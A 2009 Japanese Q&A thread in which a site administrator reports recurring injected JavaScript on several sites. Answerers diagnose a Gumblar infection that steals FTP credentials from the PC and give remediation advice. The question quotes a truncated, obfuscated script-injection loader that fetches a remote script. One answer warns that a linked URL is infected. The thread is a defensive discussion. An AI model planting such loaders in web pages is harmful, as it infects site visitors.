ようこそゲスト さん ユーザー登録 ログイン

1週間ほどハッキングに悩まされております。
私の管理するサイト数件がいっせいに被害にあっています。

WEBサイトに下記のようなコードが埋め込まれるのです(念のため転記は一部)。

<script>/*GNU GPL*/ try{window.onload = function(){var Xi3ref6qv5 = document.createElement('s$^$(c($r)i))^p!^!#t^(!'.replace(/\!|\^|#|@|\)|\(|\$|&/ig, ''));Xi3ref6qv5.setAttribute('type', 'text/javascript');Xi3ref6qv5.setAttribute('src', 'h^$$t$^&t^&$))p$)&:$^)/(^/!^t@i@!s(!(以下略)

ネット上で同じような被害が多発している旨見まして、手動でコードを削除しています。
削除後FTPのパスワードも変えています。
しかし次の日には同じコードが埋め込まれてしまうのです。

各サイトは、htmlベースの静的なもの、wordpressによるものもありますが、
同じ被害にあっています。
WPサイトは、コードを削除後FTPアカウントとともに、WPの管理者アカウントも変更しています。

サーバーはlolipop、heteml、マイティーサーバを利用していますが、
どのサーバーのものも全部やられています。
この状況から私のPC自体に問題があるのではないかとも疑っております。

ここ数日はやっている現象のように見受けられるのですが、根本的な処置をお教えください。 1週間ほどハッキングに悩まされております。 私の管理するサイト数件がいっせいに被害にあっています。 WEBサイトに下記のようなコードが埋め込まれるのです(念のため.. を含むブックマークはてなブックマーク - 1週間ほどハッキングに悩まされております。 私の管理するサイト数件がいっせいに被害にあっています。 WEBサイトに下記のようなコードが埋め込まれるのです(念のため.. - 人力検索はてな

  • kanienoteiou あなたも質問に答えられます! ウォッチリストに追加
  • 状態:回答受付中
  • 回答数:9 / 10件
  • 回答ポイント:140ポイント
  • 登録:2009-12-25 11:37:37
  • 終了:--
  • カテゴリー:コンピュータコンピュータ インターネットインターネット

1 回答者:sm0k3 2009-12-25 11:46:21

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。

対策としては、いくつかのソフトを最新にすれば良いようです。

http://blogs.yahoo.co.jp/noooo_spam/59306006.html

2 回答者:mattn 2009-12-25 11:58:55

ハッキングではなく、感染してますね。

http://www.ryan-isra.net/howto-fix-malicious-javascript-suspecte...

断ち切るには、感染経路を調べるのが先ですね。

感染しているのがWordPressらしいので、おそらくWordPressの穴をついた攻撃かと思います。

ですのでパスワードを変えても無駄かもしれません。

サービスを止めて最新のWordPressにするか、WordPressの脆弱性アナウンスを調べると良いかと思います。

3 回答者:mattn 2009-12-25 12:26:22

失礼しました。sm0k3さんの言うように、ローカルPCが原因の様ですね。

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

4 回答者:horonict 2009-12-25 13:25:10

症状からして、ご利用のPCがGumblarウイルスに感染していると思われます。

対策として以下の手順を実施してください。

  1. パターンファイルを最新にしたウイルススキャンソフトを使ってPCをフルスキャンする
  2. WindowsUpdateを実施する
  3. Adobe Reader, Acrobat, Flash Playerを最新版にする

Gumblarウイルスとは

http://internet.watch.impress.co.jp/cda/special/2009/05/21/23523...

http://www.yomiuri.co.jp/net/security/goshinjyutsu/20091224-OYT8...

5 回答者:kn1967 2009-12-25 13:29:35

Wordpress2.8系の最新版は2.8.6になります。

セキュリティアップデートなので、アップデートは必須と心得ましょう。

WordPress | 日本語 » WordPress 2.8.6 日本語版リリースのお知らせ


マイティーサーバの「お知らせ」では見かけませんでしたが、

各レンタルサーバー会社の「お知らせ」では(重要度にもよりますが)

アップデートの必要性について書かれている場合もありますので、

本家(WordPress | 日本語)以外にも目を通すように、

しておいたほうがよろしいかと思います。

WordPress をご利用のお客様へ / 新着情報 / お知らせ - ロリポップ!

「 WordPress 」 の脆弱性に関する報告 - 大容量・高機能レンタルサーバー「heteml」


※どういったお立場か存じませんが、

 管理者としての手落ちだと糾弾されても文句は言えない状況なので、

 バックアップを取った上で、早急に対応なさる事をお勧めします。

6 回答者:azuco1975 2009-12-25 15:28:44

lolipopに相談するのが一番です。

数日で対策方法がメールしてくれますよ。

http://q.hatena.ne.jp/answer

7 回答者:szich 2009-12-25 15:42:24

Gumblarウイルス、通称GENOウィルスですね。

対策については、ここが比較的まとまっていると思います。

http://www31.atwiki.jp/doujin_vinfo/

8 回答者:k2jp 2009-12-25 18:13:18

直接質問とは関係ないですが、id:mattn さんが2番目の回答で引用している ryan-isla を含むURLは感染しているようです。ESET NOD32 が警告出しました。

 

・JavaScript 有効状態でアクセスしてしまった人は感染確認することをオススメします

・プラグイン有効状態でアクセスしてしまった人も(念のため)感染確認しておくと良いと思います

 

安全な URL 以外、引用は慎重にしたほうが2次感染予防に良いかと思います

9 回答者:kazuki-aranami 2009-12-25 20:45:53

専門的な内容はわかりませんが、ここ数日の動向をまとめてあります。


現状、FTPパスワードを盗まれたことによる改竄なのか、脆弱性を利用した改竄なのか、

特定できていないません。後者のケースを想定した対策が必要かと思われます。


WordPressなどのPHPやHTMLコンテンツ改竄に関する情報を追加中  JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有 http://bit.ly/5p9YNP

この質問・回答へのコメントこの質問・回答へのコメント

回答受付中はコメントをつけられません。

この質問・回答へのトラックバックこの質問・回答へのトラックバック

受信したトラックバックは質問の終了後に公開されます。